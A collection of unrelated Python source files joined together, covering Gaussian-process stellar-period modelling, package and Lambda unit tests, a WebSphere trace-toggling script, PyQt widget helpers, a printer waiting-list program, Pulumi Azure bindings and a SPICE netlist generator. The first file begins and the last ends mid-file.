""" if not isinstance(signal, TSeries): signal = TSeries(data=signal) if periods is None: periods = a * b ** np.arange(n) if p_min is None: p_min = max(np.min(periods) / 10, 3 * signal.median_dt) periods = np.array([p for p in periods if p_min < p < signal.baseline / 2]) ps, hs, qs = [], [], [] for p_max in periods: p, h, q = signal.acf_period_quality(p_min, p_max) ps.append(p) hs.append(h) qs.append(q) def gaussian_prior(log_p): tot = 0 fh = fundamental_height hh = (1 - fh) / 2 fw = fundamental_width for p, q in zip(ps, qs): q = max(q, 0) gaussian1 = _gaussian(np.log(p), fw) gaussian2 = _gaussian(np.log(p / 2), fw) gaussian3 = _gaussian(np.log(2 * p), fw) tot += q * ( fh * gaussian1(log_p) + hh * gaussian2(log_p) + hh * gaussian3(log_p) ) tot /= np.sum(qs) return tot return gaussian_prior class GeorgeModeler(object): def __init__( self, signal, err, init_period=None, period_prior=None, bounds=None, constraints=None, ): if not isinstance(signal, TSeries): signal = TSeries(data=signal) self.signal = signal self.err = err self.t = self.signal.time self.y = self.signal.values self.sigma = np.std(self.y) self.jitter = np.min(self.err) ** 2 self.mean = np.mean(self.y) if init_period is None: init_period = np.sqrt(signal.size) * signal.median_dt if period_prior is None: sd_p = 0.2 * np.log(signal.size) def period_prior(period): return norm.logpdf(np.log(period), np.log(init_period), sd_p) self.period_prior = period_prior self.bounds = bounds self.constraints = constraints self.gp = george.GP( self.kernel, solver=george.HODLRSolver, mean=self.mean, fit_mean=True, white_noise=np.log(self.jitter), fit_white_noise=True, ) self.basic_gp = george.GP( self.kernel, mean=self.mean, fit_mean=True, white_noise=np.log(self.jitter), fit_white_noise=True, ) self.gp.compute(self.t, yerr=self.err) self.basic_gp.compute(self.t, yerr=self.err) self.ndim = len(self.gp) def log_prior(self, theta): raise NotImplementedError("subclasses must implement this method") def set_params(self, theta, gp): gp.set_parameter_vector(theta) gp.compute(self.t, yerr=self.err) return gp def get_prediction(self, time, gp): mu, var = gp.predict(self.y, t=time, return_var=True) sd = np.sqrt(var) return mu, sd def get_kernel(self, tau, gp): return gp.kernel.get_value([[0]], gp.parse_samples(tau))[0] def nll(self, theta, gp): """Objective function based on the Negative Log-Likelihood.""" gp = self.set_params(theta, gp) ll = gp.log_likelihood(self.y, quiet=True) return -ll if np.isfinite(ll) else 1e25 def grad_nll(self, theta, gp): gp = self.set_params(theta, gp) grad = -gp.grad_log_likelihood(self.y, quiet=True) return grad def minimize(self, gp, grad=False, **kwargs): """Gradient-based optimization of the objective function within the unit hypercube.""" x0 = gp.get_parameter_vector() soln = minimize( self.nll, x0, jac=self.grad_nll if grad else None, args=(gp,), bounds=self.bounds, constraints=self.constraints, **kwargs, ) opt_gp = self.set_params(soln.x, gp) return soln, opt_gp def log_prob(self, theta, gp): """Posterior distribution over the hyperparameters.""" lp = self.log_prior(theta) if not np.isfinite(lp): return -np.inf gp = self.set_params(theta, gp) lp += gp.log_likelihood(self.y) return lp def mcmc(self, n_walkers=50, n_steps=1000, burn=0, random_seed=None): """Samples the posterior probability distribution with a Markov Chain Monte Carlo simulation. Parameters ---------- n_walkers: int, optional Number of walkers (the default is 50). n_steps: int, optional Number of steps taken by each walker (the default is 1000). 
burn: int, optional Number of burn-in samples to remove from the beginning of the simulation (the default is 0). use_prior: bool, optional Whether to start walkers by sampling from the prior distribution. The default is False, in which case a ball centered at the MLE hyperparameter vector is used. Returns ------- samples: ndarray[n_dim, n_walkers * (n_steps - burn)] Samples of the posterior hyperparameter distribution. """ rng = np.random.default_rng(random_seed) np.random.seed(random_seed) soln, opt_gp = self.minimize(self.gp) x0 = soln.x + 1e-3 * rng.standard_normal((n_walkers, self.ndim)) # TODO: multi-threading sampler = emcee.EnsembleSampler( n_walkers, self.ndim, self.log_prob, args=(self.gp,) ) sampler.run_mcmc(x0, n_steps, progress=True) samples = sampler.get_chain(discard=burn, flat=True) tau = sampler.get_autocorr_time(discard=burn, quiet=True) trace = samples.T self.sampler = sampler return trace, tau class QuasiPeriodicGP(GeorgeModeler): def __init__( self, signal, err, init_period=None, period_prior=None, bounds=None, constraints=None, ): kernel = george.kernels.ConstantKernel(np.log(np.var(signal))) kernel *= george.kernels.ExpSquaredKernel(10.0) kernel *= george.kernels.ExpSine2Kernel(4.5, 0.0) self.kernel = kernel super().__init__(signal, err, init_period, period_prior, bounds, constraints) if self.bounds is None: pmin = 2 * self.signal.median_dt pmax = 0.5 * self.signal.baseline self.bounds = [ (self.mean - self.sigma, self.mean + self.sigma), (np.log(self.jitter) - 5, np.log(self.jitter) + 5), (2 * np.log(self.sigma) - 10, 2 * np.log(self.sigma) + 10), (2 * np.log(pmin), 2 * np.log(10 * pmax)), (1.0, 20.0), (np.log(pmin), np.log(pmax)), ] if self.constraints is None: # guarantee tau > period self.constraints = {"type": "ineq", "fun": lambda x: 0.5 * x[3] - x[5]} def log_prior(self, theta): mean, log_jitter, log_sigma2, log_tau2, gamma, log_period = theta tau = np.exp(log_tau2 / 2) period = np.exp(log_period) lp = norm.logpdf(mean, self.mean, self.sigma) lp += norm.logpdf(log_jitter, np.log(self.jitter), 2.0) lp += norm.logpdf(log_sigma2, 2 * np.log(self.sigma), 4.0) lp += 1 / np.log(100) lp += np.log(np.logical_and(1 < tau / period, tau / period < 10)) lp += norm.logpdf(np.log(gamma), 1.5, 1.5) lp += self.period_prior(np.exp(log_period)) return lp class CeleriteModeler(object): def __init__(self, signal, err, init_period=None, period_ppf=None): if not isinstance(signal, TSeries): signal = TSeries(data=signal) self.signal = signal self.err = err self.t = self.signal.time self.y = self.signal.values self.sigma = np.std(self.y) self.jitter = np.min(self.err) ** 2 self.mean = np.mean(self.y) if init_period is None: init_period = np.sqrt(signal.size) * signal.median_dt if period_ppf is None: def period_ppf(u): sigma_period = 0.5 * np.log(signal.size) return np.exp(norm.ppf(u, np.log(init_period), sigma_period)) self.period_ppf = period_ppf init_params = self.prior_transform(np.full(self.ndim, 50.0)) init_params["period"] = init_period mean = init_params.pop("mean") jitter = init_params.pop("jitter") self.gp = celerite2.GaussianProcess(self.kernel(**init_params), mean=mean) self.gp.compute(self.t, diag=self.err ** 2 + jitter) def prior_transform(self, u): raise NotImplementedError("subclasses must implement this method") def set_params(self, params, gp): gp.mean = params.pop("mean") jitter = params.pop("jitter") gp.kernel = self.kernel(**params) gp.compute(self.t, diag=self.err ** 2 + jitter, quiet=True) return gp def get_psd(self, frequency, gp): return gp.kernel.get_psd(2 * 
np.pi * frequency) def get_prediction(self, time, gp): mu, var = gp.predict(self.y, t=time, return_var=True) sd = np.sqrt(var) return mu, sd def get_kernel(self, tau, gp): return gp.kernel.get_value(tau) def nll(self, u, gp): """Objective function based on the Negative Log-Likelihood.""" params = self.prior_transform(u) gp = self.set_params(params, gp) return -gp.log_likelihood(self.y) def minimize(self, gp, **kwargs): """Gradient-based optimization of the objective function within the unit hypercube.""" u0 = np.full(self.ndim, 50.0) bounds = [(0.01, 99.99) for x in u0] soln = minimize( self.nll, u0, method="L-BFGS-B", args=(gp,), bounds=bounds, **kwargs ) opt_params = self.prior_transform(soln.x) opt_gp = self.set_params(opt_params, gp) return soln, opt_gp def log_prob(self, u, gp): if any(u >= 99.99) or any(u <= 0.01): return -np.inf params = self.prior_transform(u) gp = self.set_params(params, gp) ll = gp.log_likelihood(self.y) return ll def mcmc( self, n_walkers=50, n_steps=1000, burn=0, use_prior=False, random_seed=None ): """Samples the posterior probability distribution with a Markov Chain Monte Carlo simulation. Parameters ---------- n_walkers: int, optional Number of walkers (the default is 50). n_steps: int, optional Number of steps taken by each walker (the default is 1000). burn: int, optional Number of burn-in samples to remove from the beginning of the simulation (the default is 0). use_prior: bool, optional Whether to start walkers by sampling from the prior distribution. The default is False, in which case a ball centered at the MLE hyperparameter vector is used. Returns ------- trace: dict Samples of the posterior hyperparameter distribution. tau: ndarray Estimated autocorrelation time of MCMC chain for each parameter. """ rng = np.random.default_rng(random_seed) np.random.seed(random_seed) if use_prior: u0 = rng.random((n_walkers, self.ndim)) else: soln, opt_gp = self.minimize(self.gp) u0 = soln.x + 1e-3 * rng.standard_normal((n_walkers, self.ndim)) sampler = emcee.EnsembleSampler( n_walkers, self.ndim, self.log_prob, args=(self.gp,) ) sampler.run_mcmc(u0, n_steps, progress=True) samples = sampler.get_chain(discard=burn, flat=True) tau = sampler.get_autocorr_time(discard=burn, quiet=True) trace = self.prior_transform(samples.T) self.sampler = sampler return trace, tau class BrownianTerm(celerite2.terms.TermSum): def __init__(self, sigma, tau, period, mix): Q = 0.01 sigma_1 = sigma * np.sqrt(mix) f = np.sqrt(1 - 4 * Q ** 2) w0 = 2 * Q / (tau * (1 - f)) S0 = (1 - mix) * sigma ** 2 / (0.5 * w0 * Q * (1 + 1 / f)) super().__init__( celerite2.terms.SHOTerm(sigma=sigma_1, tau=tau, rho=period), celerite2.terms.SHOTerm(S0=S0, w0=w0, Q=Q), ) class BrownianGP(CeleriteModeler): def __init__(self, signal, err, init_period=None, period_ppf=None): self.ndim = 6 self.kernel = BrownianTerm super().__init__(signal, err, init_period, period_ppf) def prior_transform(self, u): u = u / 100 period = self.period_ppf(u[3]) params = { "mean": norm.ppf(u[0], self.mean, self.sigma), "sigma": np.exp(norm.ppf(u[1], np.log(self.sigma), 2.0)), "tau": period * 10 ** u[2], "period": period, "mix": u[4] * 0.5, "jitter": np.exp(norm.ppf(u[5], np.log(self.jitter), 2.0)), } return params class HarmonicGP(CeleriteModeler): def __init__(self, signal, err, init_period=None, period_ppf=None): self.ndim = 7 self.kernel = celerite2.terms.RotationTerm super().__init__(signal, err, init_period, period_ppf) def prior_transform(self, u): u = u / 100 period = self.period_ppf(u[2]) params = { "mean": norm.ppf(u[0], 
self.mean, self.sigma), "sigma": np.exp(norm.ppf(u[1], np.log(self.sigma), 2.0)), "period": period, "Q0": np.exp(norm.ppf(u[3], 1.0, 5.0)), "dQ": np.exp(norm.ppf(u[4], 2.0, 5.0)), "f": u[5], "jitter": np.exp(norm.ppf(u[6], np.log(self.jitter), 2.0)), } return params class TheanoModeler(object): def __init__(self, signal, err, init_period=None): if not isinstance(signal, TSeries): signal = TSeries(data=signal) self.signal = signal self.err = err self.t = self.signal.time self.y = self.signal.values self.sigma = np.std(self.y) self.jitter = np.min(self.err) ** 2 self.mean = np.mean(self.y) if init_period is None: init_period = np.sqrt(signal.size) * signal.median_dt self.sigma_period = 0.5 * np.log(signal.size) self.init_period = init_period def mcmc(self, n_walkers=1, n_steps=2000, burn=1000, cores=1): with self.model: trace = pmx.sample( tune=burn, draws=n_steps - burn, cores=cores, chains=n_walkers, random_seed=42, ) self.period_samples = trace["period"] return trace class BrownianTheanoGP(TheanoModeler): def __init__(self, signal, err, init_period=None, predict_at=None, psd_at=None): super().__init__(signal, err, init_period) with pm.Model() as model: # The mean flux of the time series mean = pm.Normal("mean", mu=self.mean, sd=self.sigma) # A jitter term describing excess white noise log_jitter = pm.Normal("log_jitter", mu=np.log(self.jitter), sd=2.0) # The parameters of the BrownianTerm kernel sigma = pm.Lognormal("sigma", mu=np.log(self.sigma), sd=2.0) period = pm.Lognormal( "period", mu=np.log(self.init_period), sd=self.sigma_period ) log_tau = pm.Uniform("log_tau", lower=0.0, upper=np.log(10)) tau = pm.math.exp(log_tau) * period mix = pm.Uniform("mix", lower=0.0, upper=0.5) Q = 0.01 sigma_1 = sigma * pm.math.sqrt(mix) f = pm.math.sqrt(1 - 4 * Q ** 2) w0 = 2 * Q / (tau * (1 - f)) S0 = (1 - mix) * sigma ** 2 / (0.5 * w0 * Q * (1 + 1 / f)) # Set up the Gaussian Process model kernel1 = celerite2.theano.terms.SHOTerm(sigma=sigma_1, tau=tau, rho=period) kernel2 = celerite2.theano.terms.SHOTerm(S0=S0, w0=w0, Q=Q) kernel = kernel1 + kernel2 gp = celerite2.theano.GaussianProcess(kernel, mean=mean) gp.compute(self.t, diag=self.err ** 2 + pm.math.exp(log_jitter), quiet=True) gp.marginal("obs", observed=self.y) if predict_at is not None: pm.Deterministic("pred", gp.predict(self.y, predict_at)) if psd_at is not None: pm.Deterministic("psd", kernel.get_psd(2 * np.pi * psd_at)) self.model = model class HarmonicTheanoGP(TheanoModeler): def __init__(self, signal, err, init_period=None, predict_at=None, psd_at=None): super().__init__(signal, err, init_period) with pm.Model() as model: # The mean flux of the time series mean = pm.Normal("mean", mu=self.mean, sd=self.sigma) # A jitter term describing excess white noise log_jitter = pm.Normal("log_jitter", mu=np.log(self.jitter), sd=2.0) # The parameters of the RotationTerm kernel sigma = pm.Lognormal("sigma", mu=np.log(self.sigma), sd=2.0) period = pm.Lognormal( "period", mu=np.log(self.init_period), sd=self.sigma_period ) Q0 = pm.Lognormal("Q0", mu=1.0, sd=5.0) dQ = pm.Lognormal("dQ", mu=2.0, sd=5.0) f = pm.Uniform("f", lower=0.0, upper=1.0) # Set up the Gaussian Process model kernel = celerite2.theano.terms.RotationTerm( sigma=sigma, period=period, Q0=Q0, dQ=dQ, f=f, ) gp = celerite2.theano.GaussianProcess(kernel, mean=mean) gp.compute(self.t, diag=self.err ** 2 + pm.math.exp(log_jitter), quiet=True) gp.marginal("obs", observed=self.y) if predict_at is not None: pm.Deterministic("pred", gp.predict(self.y, predict_at)) if psd_at is not None: 
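# Wrapping the PSD in pm.Deterministic (as done for "pred" above) records it in
# the MCMC trace alongside the sampled hyperparameters, so it can be inspected
# after sampling.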
pm.Deterministic("psd", kernel.get_psd(2 * np.pi * psd_at)) self.model = model lib/webports/tests/test_installed_package.py # Copyright 2014 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. from mock import call, patch, Mock import common from webports import installed_package test_info = '''\ NAME=foo VERSION=bar BUILD_ARCH=arm BUILD_CONFIG=debug BUILD_TOOLCHAIN=glibc BUILD_SDK_VERSION=123 BUILD_NACLPORTS_REVISION=98765 ''' def create_mock_installed_package(): file_mock = common.mock_file_object(test_info) with patch('__builtin__.open', Mock(return_value=file_mock), create=True): return installed_package.InstalledPackage('dummy_file') class TestInstalledPackage(common.NaclportsTest): @patch('webports.util.log', Mock()) @patch('webports.installed_package.remove_file') @patch('webports.installed_package.installed_package_iterator', Mock(return_value=[])) @patch('os.path.lexists', Mock(return_value=True)) @patch('os.path.exists', Mock(return_value=True)) def test_uninstall(self, remove_patch): # pylint: disable=no-self-use pkg = create_mock_installed_package() pkg.files = Mock(return_value=['f1', 'f2']) pkg.uninstall() # Assert that exactly 4 files we removed using remove_file calls = [call('/package/install/path/var/lib/npkg/foo.info'), call('/package/install/path/f1'), call('/package/install/path/f2'), call('/package/install/path/var/lib/npkg/foo.list')] remove_patch.assert_has_calls(calls) 10-100 ''' Enable / disable trace settings for all cluster members Cluster name is passed as first parameter to the script Tracestring is passed as second parameter if Tracestring is empty -> disable trace author: mail: license: Apache 2.0 ''' import sys if len(sys.argv) == 0: print(''' \tScript needs at least one parameter: Clustername \n\tWhen a second parameter is used, it is interpreted as trace string \n\n\tExample: \twsadmin.sh -lang jython -f clusterTrace.py InfraCluster "*=info:com.ibm.lconn.news.*=all:com.ibm.lconn.core.services.*=all:com.ibm.lconn.hpnews.*=all" ''') sys.exit() elif len(sys.argv) == 1: type = 'disabled' cluster_name=sys.argv[0] else: cluster_name=sys.argv[0] traces=sys.argv[1] type = 'enabled' if type == 'enabled': trace_string='' for trace in traces.split(':'): if trace_string=='': trace_string=trace + '=' + type else: trace_string=trace_string + ':' + trace + '=' + type else: trace_string='*=info=enabled' cluster_id = AdminConfig.getid("/ServerCluster:"+cluster_name+"/") if not cluster_id: raise "Cluster %s does not exist!" % cluster_name member_ids = AdminConfig.showAttribute(cluster_id, "members") member_ids = member_ids[1:-1] for member_id in member_ids.split(): member_name=AdminConfig.showAttribute(member_id, "memberName") node_name=AdminConfig.showAttribute(member_id, "nodeName") # Get TraceServer ID ts=AdminControl.completeObjectName('type=TraceService,process='+member_name+',*') # Set trace settings try: AdminControl.setAttribute(ts, 'traceSpecification', trace_string) print("Successfully " + type + " trace on " + node_name + '/' + member_name) except: print("Error changing trace on " + node_name + '/' + member_name) from pyqtgraph.Qt.QtCore import Qt from pyqtgraph.Qt.QtWidgets import * def create_button(text: list): """ Creates QPushButton objects inside a QGroupBox object. The default color of button will be white with black background. 
:param text: type:list - list of text for all buttons :return: group_box: QGroupBox object - add this to the widget :return: buttons: list of QPushButton objects - use this to perform tasks on the buttons """ group_box = QGroupBox() num_buttons = len(text) buttons = [] for i in range(num_buttons): button = QPushButton(text[i]) button.setCheckable(True) buttons.append(button) group_box.setStyleSheet("color: black") hbox = QHBoxLayout() for button in buttons: hbox.addWidget(button) group_box.setLayout(hbox) return group_box, buttons def create_radio(text: list, radio_group): """ Creates QRadioButton objects inside a QGroupBox object. The default color of the button background will be white. :param text: type:list - list of text for all buttons :param radio_group: QButtonGroup to add these buttons to :return: group_box: QGroupBox object - add this to the widget :return: buttons: list of QRadioButton objects - use this to perform tasks on the buttons """ group_box = QGroupBox() num_buttons = len(text) radios = [] for i in range(num_buttons): radio = QRadioButton(text[i]) # this is so that the button is properly visible on a black background radio.setStyleSheet("background-color: white") radio_group.addButton(radio) radios.append(radio) group_box.setStyleSheet("color: black") hbox = QHBoxLayout() for radio in radios: hbox.addWidget(radio) group_box.setLayout(hbox) return group_box, radios def create_slider(text, min_val, max_val, tick_spacing): """ Creates a QSlider object inside a QGroupBox object, along with a value label on the right. The slider orientation will be horizontal. :param text: text to display above the slider :param min_val: lowest value of the slider :param max_val: highest value of the slider :param tick_spacing: interval between two ticks on the slider :return: group_box: QGroupBox object - add this to the widget - see example :return: slider: QSlider object - use this to perform tasks on the slider :return: value_label: displays value of slider, update this when value is changed """ group_box = QGroupBox(text) slider = QSlider(Qt.Orientation.Horizontal) slider.setMinimum(min_val) slider.setMaximum(max_val) slider.setTickPosition(QSlider.TickPosition.TicksBothSides) slider.setTickInterval(tick_spacing) value_label = QLabel(str(slider.value())) group_box.setStyleSheet("color: white") vbox = QVBoxLayout() vbox.addWidget(slider) vbox.addWidget(value_label) group_box.setLayout(vbox) return group_box, slider, value_label
Print_prior.py # Imports # Global variables printers = [] EOL = "\n" # Class class Printer: """ The Printer class holds the information shown under each printer, e.g. the printer's name, who is printing, its status and the time. """ def __init__(self, name, time="") -> None: """ False = the printer is free. True = the printer is in use. self.name = the printer's name. self.maker = the name of the person printing. """ self.name = name self.time = time self.status = False self.maker = "" def name(self): return self.name def start(self): return self.time def check_status(self): """ The status is shown when the program is opened and tells which printers are free or busy. If a printer is in use, you can see who is printing and how long it will take. self.name is set by the index chosen in pick_printer; self.time/self.maker are set by the user in new_print. """ status = "" status = "is printing" if self.status else "is free" print(f"{self.name} {status}\nPrinting:{self.maker}\nTime:{self.time}") def new_print(self): """ Adds a name and a time and sets the printer's status to busy (the status changes from False to True). The user is identified and states how long they expect to use the printer. self.name is set in pick_printer before this function, so the program knows where to add the information. """ print("") self.status = True print(f"Adding new print to {self.name}") self.maker = input("Who is printing: ") self.time = input("Enter printing time: ") next_in_waiting() print("Your name is automatically moved from the waitinglist") get_printers() def done_printing(self): """ self.name is set in used_printer; the function removes maker and time from the printer and resets its status. self.maker = "" clears the value that was previously stored there. """ print() print(f"{self.name} is now free to use") self.maker = "" self.time = "" self.status = False print() # Functions def options(): print("(1) See waitinglist") print("(2) Add name to waitinglist") print("(3) Choose printer to use") print("(4) Done printing") print("(#) Exit the program.") def view(): """ readlines reads the waiting list line by line; count numbers the names, e.g. 1. Niclas 2. Emy 3. Anna """ lines = [] with open('waitinglist.txt') as f: lines = f.readlines() count = 0 for line in lines: count += 1 print(f'{count}: {line}') def add_to_list(): with open("waitinglist.txt", "a", encoding="utf-8") as waiting_list: name = input("Enter name:") waiting_list.write(name+"\n") get_printers() def pick_printer(): """ The printers are given an index so they can be identified when choosing one. """ print() print("Choose a printer:") print("Pick the index you want to use.") for i, printer in enumerate(printers): print(f"{i}, {printer.name}") pick = input(">>> ") return printers[int(pick)] def used_printer(): """ Same function as pick_printer except for the text that is printed. The index is used to identify which printer a print should be removed from. """ print() print("Choose used printer:") print("Pick the index you have used.") for i, printer in enumerate(printers): print(f"{i}, {printer.name}") pick = input(">>> ") return printers[int(pick)] def menu(): """ A function is called through the if statement when the input matches a choice. choice is defined by the input 1-4 or #; "#" exits the program. On invalid input the menu loops until a correct input is given. By putting the menu in a loop, menu does not have to be called again after every function. """ choice = "" while choice != "#": print("""----Options----""") options() choice = input(">>> ") if choice == "1": view() elif choice == "2": add_to_list() elif choice == "3": printer = pick_printer() printer.new_print() elif choice == "4": printer = used_printer() printer.done_printing() elif choice == "#": # Exits the loop and the program print("Goodbye!") else: # Invalid input makes the menu loop again print("Incorrect input") def next_in_waiting(): """ All names in the waiting list are numbered; the function removes the first name every time someone enters their name on one of the printers. Number 1 in the waiting list signs up on a printer and is removed from the waiting list at the same time. For this to work, people have to respect the order of the waiting list. """ waiters = [] with open("waitinglist.txt", "r", encoding="utf-8") as f: waiters = f.readlines() next_in_line = waiters.pop(0) with open("waitinglist.txt", "w", encoding="utf-8") as f: for line in waiters: f.write(line) def get_printers(): """ Shows which printers are free. The output of check_status is printed after each printer's name. """ print() print("----Printers----") for printer in printers: printer.check_status() print() def main(): #global printers nemy = Printer("Nemy") tomda = Printer("Tomda") printers.append(nemy) printers.append(tomda) print("Loading Printers...") print("Following printers are online:") for printer in printers: print(printer.name) get_printers() menu() print() if __name__ == "__main__": main()
'''Test send_log_message''' # pylint: disable=protected-access # pylint: disable=wrong-import-position # pylint: disable=redefined-outer-name from tests.conftest import * #imports testing boilerplate from requests import exceptions from moto import mock_ssm # begin testing lambda function import functions.send_log_message.lambda_function as lambda_function MESSAGE = "TEST" SUMO_SSM_NAME = "/socless/integration_name/message_url" @mock_ssm def test_handle_state(): #setup param for lambda function client = boto3.client('ssm') client.put_parameter(Name=SUMO_SSM_NAME, Type='SecureString', Value='https://httpstat.us/200', KeyId='alias/aws/ssm') # run lambda function response = lambda_function.handle_state(SUMO_SSM_NAME, MESSAGE) # test response assert response.get("status") == "success" @mock_ssm def test_handle_state_invalid_message(): #setup param for lambda function client = boto3.client('ssm') client.put_parameter(Name=SUMO_SSM_NAME, Type='SecureString', Value='https://httpstat.us/200', KeyId='alias/aws/ssm') # run lambda function with pytest.raises(TypeError): response = lambda_function.handle_state(SUMO_SSM_NAME, ['not', 'a', 'string']) @mock_ssm def test_handle_state_failed_post(): #setup failed POST param for lambda function client = boto3.client('ssm') client.put_parameter(Name=SUMO_SSM_NAME, Type='SecureString', Value='https://httpstat.us/403', KeyId='alias/aws/ssm') # run lambda function with pytest.raises(exceptions.ConnectionError): response = lambda_function.handle_state(SUMO_SSM_NAME, MESSAGE)
pulumi-bot/pulumi-azure-native # coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union from ...
import _utilities, _tables from ._enums import * __all__ = [ 'ManagedServiceIdentityArgs', ] @pulumi.input_type class ManagedServiceIdentityArgs: def __init__(__self__, *, tenant_id: Optional[pulumi.Input[str]] = None, type: Optional[pulumi.Input[Union[str, 'ManagedServiceIdentityType']]] = None, user_assigned_identities: Optional[pulumi.Input[Mapping[str, Any]]] = None): """ Managed identity generic object. :param pulumi.Input[str] tenant_id: ID of the Azure Active Directory. :param pulumi.Input[Union[str, 'ManagedServiceIdentityType']] type: Type of the managed identity. :param pulumi.Input[Mapping[str, Any]] user_assigned_identities: The list of user-assigned managed identities associated with the resource. Key is the Azure resource Id of the managed identity. """ if tenant_id is not None: pulumi.set(__self__, "tenant_id", tenant_id) if type is not None: pulumi.set(__self__, "type", type) if user_assigned_identities is not None: pulumi.set(__self__, "user_assigned_identities", user_assigned_identities) @property @pulumi.getter(name="tenantId") def tenant_id(self) -> Optional[pulumi.Input[str]]: """ ID of the Azure Active Directory. """ return pulumi.get(self, "tenant_id") @tenant_id.setter def tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "tenant_id", value) @property @pulumi.getter def type(self) -> Optional[pulumi.Input[Union[str, 'ManagedServiceIdentityType']]]: """ Type of the managed identity. """ return pulumi.get(self, "type") @type.setter def type(self, value: Optional[pulumi.Input[Union[str, 'ManagedServiceIdentityType']]]): pulumi.set(self, "type", value) @property @pulumi.getter(name="userAssignedIdentities") def user_assigned_identities(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ The list of user-assigned managed identities associated with the resource. Key is the Azure resource Id of the managed identity. 
""" return pulumi.get(self, "user_assigned_identities") @user_assigned_identities.setter def user_assigned_identities(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "user_assigned_identities", value) from django.conf.urls import patterns, url from twitch import views urlpatterns = patterns('', url(r'^live_streams$', views.available_streams, name='live_streams'), ) #!/usr/bin/env python # -*-coding:utf-8 -*- '''Generate electrical netlist.cir file for SPICE simulation TODO : create a class for device with add_instance and update methods ''' import io # To use TextIOWrapper text stream import datetime # To get current date and time # Constants _END_OF_LINE = '\n' _ZFILL_WIDTH = 5 class NetList: """Electrical netlist class containing subcircuits and devices Parameters ---------- filepath : str Complete file path where netlist is saved Attributes ---------- filepath : str Complete file path where netlist is saved subcircuits : list of SubCircuit Subcircuits present in NetList devices : list Devices present in NetList __count_device_dict : dict Count of specific devices in NetList __count_device_total : int Total count of all devices in NetList """ def __init__(self, filepath=''): """Constructor for NetList class Parameters ---------- filepath : str, optional Complete file path where netlist is saved, by default '' """ self.filepath = filepath self.subcircuits = [] self.devices = [] self.__count_device_dict = { 'R': 0, 'C': 0, 'L': 0 } self.__count_device_total = int(0) @property def count_device_dict(self): return self.__count_device_dict @property def count_device_total(self): return self.__count_device_total def get_subcircuit_names(self): return [subcircuit.name for subcircuit in self.subcircuits] def add_subcircuit(self, subcircuit): """Add a subcircuit to NetList and initialize subcircuit counter to 0 Parameters ---------- subcircuit : SubCircuit subcircuit is a netlist in a netlist which might be instantiate as a specific device like R, L, C Raises ------ TypeError if subcircuit is not a SubCircuit """ if isinstance(subcircuit, SubCircuit): self.subcircuits.append(subcircuit) self.__count_device_dict[subcircuit.name] = 0 else: raise TypeError('subcircuit must be a SubCircuit') def rlc_instance(self, device: str, nodes: list, value: float): """Create new RLC device instance in NetList with specific nodes. Parameters ---------- device : str Name of the device to insert, must be R, L or C R = Resistance, value in Ohm L = Inductance, value in Henry C = Capacitance, value in Farad nodes : list nodes of the RLC instance value : float value of the RLC instance Raises ------ ValueError if device is not an RLC component """ if device in ['R', 'L', 'C']: self.__count_device_total += 1 # Increment total counter self.__count_device_dict[device] += 1 # Increment rlc counter new_line = ('%s%d %s %.6e%s') % ( device, self.__count_device_dict[device], ' '.join(nodes), value, _END_OF_LINE ) self.devices.append(new_line) else: raise ValueError("device must be in ['R', 'L', 'C']") def subcircuit_instance(self, subcircuit, nodes: list): """Create new subcircuit instance in NetList with specific nodes. 
Parameters ---------- subcircuit : SubCircuit nodes : list nodes of the subcircuit instance Raises ------ ValueError if subcircuit is not available in the netlist TypeError if subcircuit is not a SubCircuit """ # FIXME: fix isinstance check to match SubCircuit # if isinstance(subcircuit, SubCircuit): if subcircuit.name in self.get_subcircuit_names(): # Increment total and specific device counter self.__count_device_total += 1 self.__count_device_dict[subcircuit.name] += 1 __subcircuit_number = str( self.__count_device_dict[subcircuit.name]).zfill( _ZFILL_WIDTH ) new_line = ('X_%s_%s %s %s%s') % ( subcircuit.suffix, __subcircuit_number, ' '.join(nodes), subcircuit.name, _END_OF_LINE ) self.devices.append(new_line) else: raise ValueError( ('%s does not exist as a subcircuit') % (subcircuit.name) ) print( 'Tips : use add_subcircuit method to add a new subcircuit in the netlist.\n') # else: # raise TypeError('subcircuit must be a SubCircuit') def _write_comment(self, f: io.TextIOWrapper, comment: str = ''): """Write comment in a file using text stream f Parameters ---------- f : io.TextIOWrapper text stream where comment is written comment : str, optional comment to write in the file, by default '' Raises ------ TypeError if f is not an io.TextIOWrapper """ if len(comment): if isinstance(f, io.TextIOWrapper): comment_line = ('*** %s%s') % (comment, _END_OF_LINE) f.write(comment_line) else: raise TypeError('f must be an io.TextIOWrapper') def _write_header(self): """Write netlist file header with few comments in netlist file """ with open(self.filepath, 'w') as f: self._write_comment(f, 'Generated for: SPICE') self._write_comment(f, 'By: simulation.spice python package') # Get current date and time __date_today = datetime.date.today().strftime("%d/%m/%Y") __time_now = datetime.datetime.now().strftime("%H:%M:%S") # Write current date and time self._write_comment(f, ('On: %s') % (__date_today)) self._write_comment(f, ('At: %s') % (__time_now)) self._write_comment(f, ' ') def _write_subcircuits(self): """Write subcircuits in netlist file """ try: with open(self.filepath, 'a+') as f: print('subcircuits below will be written in the netlist :') print(self.get_subcircuit_names()) self._write_comment(f, 'subcircuits') for subcircuit in self.subcircuits: subcircuit._write_subcircuit(f) finally: print('subcircuits from netlist successfully written.\n') def _write_instances(self): """Write instances in netlist file """ try: with open(self.filepath, 'a+') as f: comment = 'Instances' self._write_comment(f, comment) for device in self.devices: f.write(device) finally: print('Instances from netlist successfully written.\n') def write_in_fpath(self): """Write header, subcircuits and instances in netlist file """ self._write_header() self._write_subcircuits() self._write_instances() class SubCircuit(NetList): """Child class inherited from NetList representing a subcircuit Parameters ---------- NetList : NetList netlist containing subcircuits and devices Attributes ---------- name : str, optional name of the subcircuit, by default '' external_nodes : list, optional external nodes of the subcircuit to connect with other devices, by default [] suffix : str, optional suffix to use while instantiating the subcircuit, by default '' """ def __init__(self, name: str = '', external_nodes=[], suffix: str = '', comment: str = ''): """Constructor of SubCircuit class Initiate subcircuit using super class constructor and parameters. 
